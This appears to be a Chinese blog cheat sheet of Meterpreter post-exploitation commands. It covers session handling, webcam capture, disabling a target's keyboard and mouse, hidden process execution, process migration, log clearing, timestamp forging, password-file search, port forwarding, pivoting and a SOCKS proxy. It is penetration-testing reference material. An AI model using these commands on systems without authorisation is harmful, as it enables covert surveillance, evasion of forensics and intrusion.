再探 Metasploit 持续更新中

一 . 配置环境

系统: kali-linux  1.0     教程:https://www.jianshu.com/p/27ca274b70c8

版本: Framework        Console

二 .  基础知识

三 .  引自 Meterpreter

0 × 01  系统命令

1)基本系统命令

       session      -i   <ID值>     #进入会话    -k     干掉会话

       background    # 将当前会话放置后台

       run    # 执行已有的模块

       info    # 查看已有模块

       getuid    # 查看权限

       getpid    # 获取当前进程的 pid

       sysinfo    # 查看目标机系统信息

       ps    # 查看当前活跃进程

       idletime    # 查看目标机闲置时间

       reboot / shutdown   # 重启 / 关机

       shell    # 进入目标机

2)uictl 开关键盘/鼠标

      uictl [enable/disable] [keyboard/mouse/all] #开启或禁止键盘/鼠标

      uictl disable mouse #禁用鼠标        uictl disable keyboard #禁用键盘

3)网络摄像头命令

       webcam_list    # 查看摄像头

       webcam_snap    # 通过摄像头拍照

       webcam_stream     # 通过摄像头开启视频

4)执行可执行文件

       execute   # 在目标机中执行文件

       execute  -H  -i  -f  cmd.exe   # 创建新进程 cmd.exe -H不可见 -i交互  -f  程序

5)迁移进程

       getpid    #获取当前进程的pid

       ps        #查看当前活跃进程

       migrate  <pid值>    #将Metepreter会话移植到制定的pid值的进程中

6) clearev 清除日志

0 x 02   文件系统命令

1)基于文件系统命令

       getwd 或者 pwd    # 查看当前目标机工作目录

       getlwd    # 查看当前本机的工作目录

       ls    # 列出当前目录中的文件

       cd    # 进入目标机指定目录

       lcd    # 进入本机指定目录

       search   -f   *pass*    # 搜索文件

       cat   # 查看指定文件的内容

       upload  # 上传文件到目标机

       download    # 下载文件到本机

       edit    # 编辑或创建文件<创建文件有待在更新版本的msf上测试>

       rm    # 删除文件

       mkdir / rmdir    # 只能在当前目录下创建/删除文件夹

2) timestomp 伪造时间戳

       timestomp   -v   C://2.txt   # 查看时间戳

       timestomp   C://2.txt   -f   C://1.txt     # 将1.txt 的时间戳给 2.txt  

0 × 03 网络命令

1)基本网络命令

       ifconfig / ifconfig

       netstat  -ano

       arp

       getproxy   # 查看代理信息

       route    

2)portfwd端口转发

       portfwd    add   -l   6666  -p  3389   -r   127.0.0.1    #将目标机的3389端口转发到本地的6666

3) 自动添加路由

       run   autoroute   -s   192.168.159.0/24   # 添加到目标环境网关的路由表

        run   autoroute   -p    #查看添加的路由  

4)  SOCKS4A代理

       msf> use  auxiliary / server / socks4a

       msf>  set   srvhost   127.0.0.1

       msf>  set   srvport    1080

       msf>  run

0 × 04  信息收集   <功能强大,会合你胃口>

       插件位置如下

       post/winodws/gather

       post/linux/gather

0 × 05   提权

1)getsystem提权

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 202,905评论 5 476
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 85,140评论 2 379
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 149,791评论 0 335
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 54,483评论 1 273
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 63,476评论 5 364
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 48,516评论 1 281
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 37,905评论 3 395
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 36,560评论 0 256
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 40,778评论 1 296
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 35,557评论 2 319
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 37,635评论 1 329
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 33,338评论 4 318
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 38,925评论 3 307
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 29,898评论 0 19
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 31,142评论 1 259
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 42,818评论 2 349
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 42,347评论 2 342

推荐阅读更多精彩内容

  • 运行操作 CMD命令:开始->运行->键入cmd或command(在命令行里可以看到系统版本、文件系统版本) CM...
    小明yz阅读 2,747评论 0 8
  • 命令简介 cmd是command的缩写.即命令行 。 虽然随着计算机产业的发展,Windows 操作系统的应用越来...
    ___大鱼___阅读 1,097评论 1 5
  • .bat脚本基本命令语法 目录 批处理的常见命令(未列举的命令还比较多,请查阅帮助信息) 1、REM 和 :: 2...
    庆庆庆庆庆阅读 8,036评论 1 19
  • 个人学习批处理的初衷来源于实际工作;在某个迭代版本有个BS(安卓手游模拟器)大需求,从而在测试过程中就重复涉及到...
    Luckykailiu阅读 4,675评论 0 11
  • 官网 中文版本 好的网站 Content-type: text/htmlBASH Section: User ...
    不排版阅读 4,360评论 0 5